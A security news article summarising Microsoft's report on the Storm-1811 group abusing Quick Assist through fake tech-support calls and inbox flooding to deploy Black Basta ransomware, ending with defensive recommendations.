Microsoft Quick Assist Exploited in Ransomware Attacks by Storm-1811

The Microsoft Threat Intelligence team has identified a cybercriminal group known as Storm-1811 exploiting Microsoft’s Quick Assist feature in social engineering attacks to deploy ransomware. In a report published on May 15, 2024, Microsoft detailed how this financially motivated group uses Quick Assist to target users, ultimately delivering Black Basta ransomware.

Storm-1811 initiates their attack by impersonating trusted contacts, such as Microsoft technical support or an IT professional from the victim’s company, via voice phishing. This deception persuades victims to install remote monitoring and management (RMM) tools, which are then used to deliver QakBot, Cobalt Strike, and Black Basta ransomware.

Quick Assist, a legitimate Microsoft application, allows users to share their Windows or macOS devices over a remote connection for troubleshooting purposes. This tool, pre-installed on Windows 11 devices, is being misused by attackers who pretend to offer technical support to gain initial access.

To enhance their ruse, attackers perform link listing attacks, flooding the target’s email inbox with subscription content to create a sense of urgency. They then pose as the victim’s IT support team, offering help to resolve the spam issue and convincing the victim to grant remote access via Quick Assist.

Once access is granted, the attacker executes a scripted cURL command to download and run batch or ZIP files containing malicious payloads. This leads to hands-on-keyboard activities such as domain enumeration and lateral movement within the network. Storm-1811 then uses PsExec to deploy Black Basta ransomware across the network.

Microsoft is closely monitoring the misuse of Quick Assist and is working on adding warning messages to the software to alert users about potential tech support scams. The campaign, which began in mid-April 2024, targets various industries including manufacturing, construction, food and beverage, and transportation, indicating its opportunistic nature.

The low entry barrier for conducting these attacks, combined with their significant impact, makes ransomware a lucrative method for cybercriminals. Black Basta is described by Microsoft as a “closed ransomware offering,” not operating as a ransomware-as-a-service (RaaS). Instead, it involves a small group of threat actors who rely on others for initial access and infrastructure.

Since its first appearance in April 2022, Black Basta has been deployed following initial access from QakBot and other malware distributors. This highlights the importance of focusing on the early stages of an attack to mitigate the threat of ransomware deployment.

To prevent ransomware attacks exploiting Microsoft’s Quick Assist, organizations should disable Quick Assist if not required and educate users on the risks of unsolicited tech support offers. Implementing multi-factor authentication (MFA) can add an extra layer of security, making it harder for attackers to gain unauthorized access. Additionally, maintaining updated antivirus and endpoint protection solutions can block malicious payloads.